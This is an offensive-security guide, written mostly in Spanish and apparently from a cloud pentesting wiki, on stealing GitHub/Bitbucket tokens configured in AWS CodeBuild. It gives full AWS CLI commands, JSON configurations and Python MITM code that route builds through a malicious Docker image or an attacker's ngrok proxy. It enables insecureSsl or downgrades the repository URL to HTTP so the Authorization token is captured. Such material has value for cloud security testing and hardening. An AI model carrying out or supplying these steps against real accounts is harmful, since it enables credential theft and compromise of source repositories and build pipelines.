AWS Codebuild - Token Leakage

Recuperar Tokens Configurados de Github/Bitbucket

Primero, verifica si hay credenciales de origen configuradas que podrías filtrar:

aws codebuild list-source-credentials

Via Docker Image

Si encuentras que la autenticación, por ejemplo, a Github está configurada en la cuenta, puedes exfiltrar ese acceso (token de GH o token de OAuth) haciendo que Codebuild utilice una imagen de docker específica para ejecutar la construcción del proyecto.

Para este propósito, podrías crear un nuevo proyecto de Codebuild o cambiar el entorno de uno existente para establecer la imagen de Docker.

La imagen de Docker que podrías usar es https://github.com/carlospolop/docker-mitm. Esta es una imagen de Docker muy básica que establecerá las variables de entorno https_proxy, http_proxy y SSL_CERT_FILE. Esto te permitirá interceptar la mayor parte del tráfico del host indicado en https_proxy y http_proxy y confiar en el CERT SSL indicado en SSL_CERT_FILE.

1. Crea y sube tu propia imagen de Docker MitM

• Sigue las instrucciones del repositorio para establecer tu dirección IP de proxy y configurar tu certificado SSL y construir la imagen de docker.

• NO CONFIGURES http_proxy para no interceptar solicitudes al endpoint de metadatos.

• Podrías usar ngrok como ngrok tcp 4444 para establecer el proxy en tu host.

• Una vez que tengas la imagen de Docker construida, cárgala en un repositorio público (Dockerhub, ECR...)

1. Configura el entorno

• Crea un nuevo proyecto de Codebuild o modifica el entorno de uno existente.

• Configura el proyecto para usar la imagen de Docker generada previamente.

1. Configura el proxy MitM en tu host

• Como se indica en el repositorio de Github, podrías usar algo como:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

1. Ejecutar la construcción y capturar las credenciales

• Puedes ver el token en el encabezado de Authorization:

Esto también se podría hacer desde la aws cli con algo como

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Via insecureSSL

Codebuild projects have a setting called insecureSsl that is hidden in the web you can only change it from the API. Habilitar esto permite a Codebuild conectarse al repositorio sin verificar el certificado ofrecido por la plataforma.

• First you need to enumerate the current configuration with something like:

aws codebuild batch-get-projects --name <proj-name>

• Luego, con la información recopilada, puedes actualizar la configuración del proyecto insecureSsl a True. El siguiente es un ejemplo de cómo actualicé un proyecto, nota el insecureSsl=True al final (esto es lo único que necesitas cambiar de la configuración recopilada).

• Además, agrega también las variables de entorno http_proxy y https_proxy apuntando a tu tcp ngrok como:

aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "https://2.tcp.eu.ngrok.io:15027"
}
]
}'

• Luego, ejecuta el ejemplo básico de https://github.com/synchronizing/mitm en el puerto indicado por las variables del proxy (http_proxy y https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Finalmente, haz clic en Construir el proyecto, las credenciales serán enviadas en texto claro (base64) al puerto mitm:

A través del protocolo HTTP

Un atacante con permisos elevados en un CodeBuild podría filtrar el token de Github/Bitbucket configurado o si los permisos fueron configurados a través de OAuth, el token OAuth temporal utilizado para acceder al código.

• Un atacante podría agregar las variables de entorno http_proxy y https_proxy al proyecto de CodeBuild apuntando a su máquina (por ejemplo http://5.tcp.eu.ngrok.io:14972).

• Luego, cambia la URL del repositorio de github para usar HTTP en lugar de HTTPS, por ejemplo: http://github.com/carlospolop-forks/TestActions

• Luego, ejecuta el ejemplo básico de https://github.com/synchronizing/mitm en el puerto señalado por las variables de proxy (http_proxy y https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Finalmente, haz clic en Construir el proyecto, las credenciales serán enviadas en texto claro (base64) al puerto mitm: